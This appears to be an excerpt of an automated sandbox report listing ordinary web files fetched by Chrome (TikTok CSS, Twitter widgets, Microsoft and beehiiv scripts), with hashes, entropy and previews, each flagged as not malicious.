                                                                                                                                            SHA-256:8C107541703C4D748D507C1827566254C8A950DC913E83F6EC490E5CEC3ECA0F
                                                                                                                                            SHA-512:586026DF38B77FC3631CFCCE1FAF4DC1384954C6B22CD90502E50A7AF79F186C1E1F03743D68C095F8F672D3FC133BFE2F44B02DC7A978A9C4B8EC6F5D9EB9D5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://lf16-tiktok-web.tiktokcdn-us.com/obj/tiktok-web-tx/tiktok/falcon/embed/embed_lib_v1.0.12.css
                                                                                                                                            Preview:@media screen and (max-width:655px){.tiktok-embed{margin:0 25px}}.tiktok-embed{position:relative;display:block;width:100%;margin:18px auto;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;line-height:1.15;overflow:hidden;-webkit-text-size-adjust:100%;font-family:"proxima-regular","PingFangSC",sans-serif;font-weight:400}.tiktok-embed ::-webkit-scrollbar{display:none}.tiktok-embed>section{position:relative;border:1px solid rgba(22,24,35,.12);-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border-radius:8px}.tiktok-embed>section>*{display:block;padding:0 12px}.tiktok-embed>section>:first-child{padding-top:12px}.tiktok-embed>section>:last-child{padding-bottom:12px}.tiktok-embed>section:before{content:"";display:block;width:100%;height:300px;border-radius:8px;background-image:-webkit-gradient(linear,left top,right top,color-stop(0,rgba(252,252,252,0)),color-stop(50%,#fcfcfc),to(rgba(252,252,252,0))),-webkit-gradient(linear,left to
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (38752)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):93065
                                                                                                                                            Entropy (8bit):5.182415079046025
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gOZ0ptDYb251aRoM7dxBKikcHpOPM9BW7PJGu8ryMUsFg4/:gpxFmxDIPwRu4/
                                                                                                                                            MD5:824BEB891744DB98CCBD3A456E59E0F7
                                                                                                                                            SHA1:57082A005D743EC4A7F928A928BD7BD561078C7C
                                                                                                                                            SHA-256:173460E89E6A7244218BADAE2016F65C48A3EAE9D400802273EECA18B07336F1
                                                                                                                                            SHA-512:6C19E304AF16AE43504A44EB60C542526D0D8F635E4F57AB557E93999AD608BE99C25354898EF4826DEFE63F8BA72E4D09C5EAC445EFBDE4587534CA202958E2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://platform.twitter.com/widgets.js
                                                                                                                                            Preview:Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||(window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.loaded&&window.twttr.widgets.load&&window.twttr.widgets.load(),window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.init||function(t){function e(e){for(var n,i,o=e[0],s=e[1],a=0,c=[];a<o.length;a++)i=o[a],r[i]&&c.push(r[i][0]),r[i]=0;for(n in s)Object.prototype.hasOwnProperty.call(s,n)&&(t[n]=s[n]);for(u&&u(e);c.length;)c.shift()()}var n={},r={0:0};function i(e){if(n[e])return n[e].exports;var r=n[e]={i:e,l:!1,exports:{}};return t[e].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.e=function(t){var e=[],n=r[t];if(0!==n)if(n)e.push(n[2]);else{var o=new Promise(function(e,i){n=r[t]=[e,i]});e.push(n[2]=o);var s,a=document.getElementsByTagName("head")[0],u=document.createElement("script");u.charset="utf-8",u.timeout=120,i.nc&&u.setAttribute("nonce",i.nc),u.src=function(t){return i.p+"js/"+({1:"dm_button
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3620
                                                                                                                                            Entropy (8bit):6.867828878374734
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):6
                                                                                                                                            Entropy (8bit):2.584962500721156
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:fCu:au
                                                                                                                                            MD5:AAAB7A355103063D9EEB4824A3A6B374
                                                                                                                                            SHA1:E51555F02C32321F3E48F07A0FA5AF46DF835BFC
                                                                                                                                            SHA-256:79BA862622D6FA84AC7E4F98EB95043A255FC2C81711E9400A8AA4D4B1608471
                                                                                                                                            SHA-512:D1A0C9C4F628459F5CA904405B2A66A69425A50E8DCE1BAA43161D784EB219BD3E1FD9447BCBACC314652EDA08CF0B02C863C87F3AC1534AE0F62A414C191F1B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://fpt.live.com/Images/Clear.PNG?ctx=jscb1.0&session_id=d811912f5bba4f73bc2c1cacef83fd6e&CustomerId=33e01921-4d64-4f8c-a055-5bdaffd5e33d&esi=YnVhPU1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTcuMC4wLjAgU2FmYXJpLzUzNy4zNiZvcz1XaW4zMiZscHJvYz00Jm9sPXRydWUmcnR0PTE1MCZjaHJtPXRydWUmcHJvc3ViPTIwMDMwMTA3JmV2YWw9MzMmYXBwdj01LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2JmxzPXRydWUmZG09OCZtdHA9MCZuYz03NCZwcj0xJnNyPTEyODB4MTAyNCZzY2Q9MjQmYXNyPTEyODB4OTg0JnR6PS0zMDAmZHN0PTYwJnR6bz0tMzAwJmJsPWVuLVVTJm10aD0yN2Y1MWQzMTQ5ZTZiZjIwOWI2NmJkMzg3YjBhZjNjNCZtdG49MiZwbj01JnBoPWYzYWMyMmFjNTljNmRjYjg3NDEwOWQwOTNjNTI1NWU4JnA9cGx1Z2luX2ZsYXNoJTNEZmFsc2UlMjZwbHVnaW5fd2luZG93c19tZWRpYV9wbGF5ZXIlM0RmYWxzZSUyNnBsdWdpbl9hZG9iZV9hY3JvYmF0JTNEZmFsc2UlMjZwbHVnaW5fc2lsdmVybGlnaHQlM0RmYWxzZSUyNnBsdWdpbl9xdWlja3RpbWUlM0RmYWxzZSUyNnBsdWdpbl9zaG9ja3dhdmUlM0RmYWxzZSUyNnBsdWdpbl9yZWFscGxheWVyJTNEZmFsc2UlMjZwbHVnaW5fdmxjX3BsYXllciUzRGZhbHNlJTI2cGx1Z2luX2RldmFsdnIlM0RmYWxzZSUyNnBsdWdpbl9zdmdfdmlld2VyJTNEZmFsc2UlMjZwbHVnaW5famF2YSUzRGZhbHNlJmZoPTJhMjk4NDlhZjA3ZGQxNjFkZGM3MzA0MGJlMjVmM2YwJmZuPTExMiZmZG09MmMwMDEsMjEyMDAwMDAsZTVhODBlMCwxMDAwMDAyLDE4MGZmZjVlLDNkZDdkZmVmLDNmZWZlNmE3LDNmZGRmZmY4LDAsMCZsaD1odHRwcyUzQSUyRiUyRmZwdC5saXZlLmNvbSUyRiUzRnNlc3Npb25faWQlM0RkODExOTEyZjViYmE0ZjczYmMyYzFjYWNlZjgzZmQ2ZSUyNkN1c3RvbWVySWQlM0QzM2UwMTkyMS00ZDY0LTRmOGMtYTA1NS01YmRhZmZkNWUzM2QlMjZQYWdlSWQlM0RTVSZkcj1odHRwcyUzQSUyRiUyRnNpZ251cC5saXZlLmNvbSUyRiZ3PThERDM1OTBCNTg2QzdENiZpZD00ZjJkNmYzOS05Mjg1LWY4MGMtMDMwNS05ODA4MWE4MTQzYWYmYT0mYz1iMGVhZGI5MzQxNjZiNjk2MDdiODI1OTIyMzM2MTc2ZA==&eci=eyJ1dmRyIjoiR29vZ2xlIEluYy4gKEdvb2dsZSkiLCJ1cmRyIjoiQU5HTEUgKEdvb2dsZSwgVnVsa2FuIDEuMy4wIChTd2lmdFNoYWRlciBEZXZpY2UgKFN1Ynplcm8pICgweDAwMDBDMERFKSksIFN3aWZ0U2hhZGVyIGRyaXZlcikiLCJ2ZHIiOiJXZWJLaXQiLCJyZHIiOiJXZWJLaXQgV2ViR0wiLCJpZHVoIjoiMTViNmNhNDcyNjliZTQyODc1Njg1MDY5MzdlOTkxN2MifQ==&PageId=SU&u1=&u3=10.0.0&u4=x86&u5=64&u2=(Google%20Chrome%2C117.0.5938.132)%2C(Not%3BA%3DBrand%2C8.0.0.0)%2C(Chromium%2C117.0.5938.132)&met=eyJmcGwiOjE3MzY5NjQ5NzkzNTUsImJydyI6IjAuNTAiLCJkaXMiOiIwLjEwIiwidG16IjoiMC4wMCIsImxhbiI6IjAuMTAiLCJzb2YiOiI4MTMuMTAiLCJleHQiOiIwLjAwIiwicHJiIjoiMC4xMCIsIkdldENhbnZhc0RhdGEiOiIxNi40MCIsInBsIjozLjgwMDAwMDAwMDAxNzQ2MjMsImZwIjoiODQxLjQwIn0=
                                                                                                                                            Preview:dfp:OK
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17174
                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1134)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1492
                                                                                                                                            Entropy (8bit):5.463656351700173
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuS+7UNKabQufFTfMiFoJgzhLTCoULEuml/GG/t0lZcyPgyO7+uXk7u:JWkExN9bQuFMShWLfmUQt26quU7nu
                                                                                                                                            MD5:616C4A59027CB60FE037A620AB691867
                                                                                                                                            SHA1:E7A19F00EF3FCAF3B43D43EC632A8B79B12850CA
                                                                                                                                            SHA-256:C2E1C62232302D263E91BB2E68B34973507A3550527B91D9C8A02AC9143628A9
                                                                                                                                            SHA-512:2F9E99B06916FD1B3CEF2689F4C805557F77E046D8DCFAF6F5969754EF234A69BA92B5297878A4DF53F4A91325B317A14815B12BCA724A249D74008E64D488D6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/Image-ycA_AFLr.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c5164328-a43d-5fbd-b391-b0988a59e21e")}catch(e){}}();.import{j as m}from"./jsx-runtime-BjG_zV1W.js";import{c as f}from"./index-x2da_zcv.js";import{r as p}from"./index-D6da9p6-.js";const l={"beehiiv-images-production.s3.amazonaws.com":"media.beehiiv.com","media.beehiiv.net":"media.beehiiv.com","beehiiv-images-staging.s3.amazonaws.com":"media.staginghiiv.com","staging-media.beehiiv.net":"media.staginghiiv.com"},v=(i,s)=>{let e=null;try{e=new URL(i)}catch{}if(!!!(e&&Object.keys(l).includes(e.host)))return i;const t=l[e?.host],a=new URLSearchParams(s).toString().replace(/&/g,",");return`https://${t}/cdn-cgi/image/${a}${e?.pathname}`},x=({src:i,alt:s,maxWidth:e,aspectRatio:o,widthClass:t,...a})=>{const c=p.useRef(null),h={social:"aspect-social",square:"aspect-square",video:"aspect-vid
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (543)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):900
                                                                                                                                            Entropy (8bit):5.420679104071606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSiYaNsLtf/V9wabRmGbCRiGbpNLReOBvw2hcbGbpN52tmR7:JWkEmNqtn3wCwGbCYGbDZhoGbwEB
                                                                                                                                            MD5:CACF9205180D73129CE3BA0102347111
                                                                                                                                            SHA1:FB5F31F7B0CE289777315327AFDEBF5D99E7DED3
                                                                                                                                            SHA-256:D7725E2BFFA0C27EEB262F9912E29FE6EE267C80FB0B8E8CD7050886213120CA
                                                                                                                                            SHA-512:EA4DCE41D267FEE195B257E51948910E345413F05720733A19BDE2414814B1ECBAB3CE95E852997D6E64E68B8B45298679D79B12A02B6B6AC661F0F7DF31D97E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/bugs-DVQzBh-s.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9a76406-c909-5808-b09f-67c6f407b774")}catch(e){}}();.import{r as i}from"./index-D6da9p6-.js";import{b as l}from"./keyboard-CaEu2o0u.js";function s(){let[t]=i.useState(l);return i.useEffect(()=>()=>t.dispose(),[t]),t}function m(t){let e=t.parentElement,n=null;for(;e&&!(e instanceof HTMLFieldSetElement);)e instanceof HTMLLegendElement&&(n=e),e=e.parentElement;let r=e?.getAttribute("disabled")==="";return r&&o(n)?!1:r}function o(t){if(!t)return!1;let e=t.previousElementSibling;for(;e!==null;){if(e instanceof HTMLLegendElement)return!1;e=e.previousElementSibling}return!0}export{s as p,m as r};.//# sourceMappingURL=bugs-DVQzBh-s.js.map..//# debugId=e9a76406-c909-5808-b09f-67c6f407b774.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13631)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):44165
                                                                                                                                            Entropy (8bit):5.323504130834923
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:Xd/BoDlgz5HaFsML4jsLaFQp/yykuyRKeKrId+zbTDLu8FM+DUtexy1dz9:5Boz34QLo4yywErId4TDa7t5n
                                                                                                                                            MD5:10AC4CBAFFE65F0BFB5D561749C6DA2D
                                                                                                                                            SHA1:858270EB2C63DF09CB5D1480654D34A3F258A018
                                                                                                                                            SHA-256:2EB96604BD72AB3C21BEB0B13932CD9531354C98C808C775CC37CDB9C80D2800
                                                                                                                                            SHA-512:72D9EF1AFE44E39F3B246BC3D7E3517D6010AA50B6FE51ABCFC948AA47F5335453778A31DF99D435EF18EB9C3143CD6E8C81B42B5DC78F883648F50828C0311C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/components-Oj2xMfGE.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="eea4b823-7d77-5133-9b39-28cd235af77e")}catch(e){}}();.import{r as s,g as ft,N as z,h as dt,i as $e,j as F,k as te,a as U,l as mt,m as de,s as j,D as ge,u as Ie,I as ht,R as Fe,n as re,o as pt,p as yt,q as ve,t as xe,v as Me,d as je,w as gt,A as vt,x as St,y as wt,E as Et,z as _t,B as Rt,C as Ue,F as bt,G as xt,H as Tt}from"./index-D6da9p6-.js";function Lt(e,t){for(var r=0;r<t.length;r++){const n=t[r];if(typeof n!="string"&&!Array.isArray(n)){for(const a in n)if(a!=="default"&&!(a in e)){const i=Object.getOwnPropertyDescriptor(n,a);i&&Object.defineProperty(e,a,i.get?i:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var He={exports:{}},O={};/**. * @license React. * react-dom.production.js. *. * Copyright (c) Meta Pl
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.557768118179261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:YEFz7kZPZ+sDZbfIup6GvDF7DZmZ+51DZd/nm7UZX:YEdkVgMNwsMyVr/mIp
                                                                                                                                            MD5:AD809A6B9AFDA5DDE3EFF67031431B4B
                                                                                                                                            SHA1:060E8CBE024196552636C951D6CDF83AEE97F55B
                                                                                                                                            SHA-256:8EC44A4B321F5115D8760F193298585D8B28A26DD3190D0A3690B9E09A489A94
                                                                                                                                            SHA-512:D36BDEF3595ECF8BD520C5292C2F14390D768958A26D8A2D5252D27C18EA1F3A7FCE522FE250027C98A2F0A56DC853A48396309F9A2816404CFE95DF9BAFBB0F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://syndication.twitter.com/settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6
                                                                                                                                            Preview:{"should_obtain_cookie_consent":false,"features":{"tfw_timeline_list":{"bucket":[],"version":null},"tfw_follower_count_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_backend":{"bucket":"on","version":null},"tfw_refsrc_session":{"bucket":"on","version":null},"tfw_fosnr_soft_interventions_enabled":{"bucket":"on","version":null},"tfw_mixed_media_15897":{"bucket":"treatment","version":null},"tfw_experiments_cookie_expiration":{"bucket":1209600,"version":null},"tfw_show_birdwatch_pivots_enabled":{"bucket":"on","version":null},"tfw_duplicate_scribes_to_settings":{"bucket":"on","version":null},"tfw_use_profile_image_shape_enabled":{"bucket":"on","version":null},"tfw_video_hls_dynamic_manifests_15082":{"bucket":"true_bitrate","version":null},"tfw_legacy_timeline_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_frontend":{"bucket":"on","version":null}}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1204)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1569
                                                                                                                                            Entropy (8bit):5.475069346064321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEKvNjJzEA6UizDodI+XGbohOCrx8NwKQGCBNbN60:QmJEUiIdI+dACV8CJGCN60
                                                                                                                                            MD5:5B0E783F3BE40B8E9189BE44656FF61B
                                                                                                                                            SHA1:690B0B8844330A9A8F05DB44FAEA5D42E444E817
                                                                                                                                            SHA-256:7CCFE2ADB608C7BD3691716896ECCE27E68A6863754566DC3872105EC7D57BA0
                                                                                                                                            SHA-512:75CFD087B6F4ACB797CD80F5C9F367B67894AA31606AC0808D263B434DFB71FCCA89F35B5FE74F75797462CE2C9BE227D4D090B5B47B577C71D39D7A97DCA94F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/PageProvider-uKxoiNdl.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f5b8d081-4229-51d0-a06f-3cacf570872c")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";import{u as m}from"./components-Oj2xMfGE.js";import{j as i}from"./jsx-runtime-BjG_zV1W.js";var d=(e=>(e.SIGNUP_REDIRECTS="signup_redirects",e.EMAIL="email",e))(d||{});const f=e=>e?e.replace(/ /g,"+"):"";function E(e,r){const[s,o]=c.useState(()=>{if(typeof window>"u")return r;try{const t=window.localStorage.getItem(e);return t?JSON.parse(t):r}catch(t){return console.error(t),r}});return[s,t=>{try{const n=t instanceof Function?t(s):t;o(n),typeof window<"u"&&window.localStorage.setItem(e,JSON.stringify(n))}catch(n){console.error(n)}}]}const g=()=>{const[e]=m(),[r,s]=E("email",""),o=e.get("email"),a=o||r,t=n=>{s(n)};return c.useEffect(()=>{o&&!r&&s(o),o&&r&&o!==r&&s(o)},[]),[f(a),t]},w=g,u=c
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4665)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7148
                                                                                                                                            Entropy (8bit):5.265109224869054
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:skOa6YVlWhBNF9fhFOnuttP/F3b8uXX85DH:zdWhTr5FqgQEs5
                                                                                                                                            MD5:6DE0520A7B05F44D3D37356B2CAE694A
                                                                                                                                            SHA1:364D51B1DECBE758E8EAE73BACE094CDB14AA16B
                                                                                                                                            SHA-256:D456BDB126C069316781093BA369B1ED7BA836DB0795DBE0E658E4D34DD572A2
                                                                                                                                            SHA-512:A398CA6B73318B58E540DF700F0BA30AB1BE202FC9D9D7FE54387D9AA4C7BCE5AC869F9EF1BDB7EE6602026E41908624545CD1E18DEA44FF7B0142F94C53551B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b4c770d-59bf-5be1-ab78-6cf4d19e2599")}catch(e){}}();.import{r as a,e as j,R as S}from"./index-D6da9p6-.js";var R=Object.defineProperty,P=(e,t,n)=>t in e?R(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,w=(e,t,n)=>(P(e,typeof t!="symbol"?t+"":t,n),n);let x=class{constructor(){w(this,"current",this.detect()),w(this,"handoffState","pending"),w(this,"currentId",0)}set(t){this.current!==t&&(this.handoffState="pending",this.currentId=0,this.current=t)}reset(){this.set(this.detect())}nextId(){return++this.currentId}get isServer(){return this.current==="server"}get isClient(){return this.current==="client"}detect(){return typeof window>"u"||typeof document>"u"?"server":"client"}handoff(){this.handoffState==="pending"&&(this.handoffState="complete")}get isHandoffComplete
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):370
                                                                                                                                            Entropy (8bit):5.480696965068107
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYEXnENNw1QYHJEPBAXF:UgDGH4LOaOvCaBfuS8XENwnpiBAXF
                                                                                                                                            MD5:D624A1A829245C6171AFA7A52EAABCB9
                                                                                                                                            SHA1:A86AAA544B7108482FF2D729CDCA09F8292FCFA2
                                                                                                                                            SHA-256:6DE1DD1E5F22E02D44F50664064F3A5B8E2C97CDF51B51EC821DA2056A222319
                                                                                                                                            SHA-512:93F33879D03ADAE86C6F82A623B42FD8045D7E720B95470BE5605F3DF71BB3A252B8D9B7D719C4CB861CFBF1F27B9B1FEF5A39C24100EDD3A09A7976016B2822
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/recommended_posts-l0sNRNKZ.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e64629d-d049-5400-bedc-5fbef12c7d43")}catch(e){}}();..//# sourceMappingURL=recommended_posts-l0sNRNKZ.js.map..//# debugId=7e64629d-d049-5400-bedc-5fbef12c7d43.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16378
                                                                                                                                            Entropy (8bit):7.986541062710992
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                            MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                            SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                            SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                            SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1204)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1569
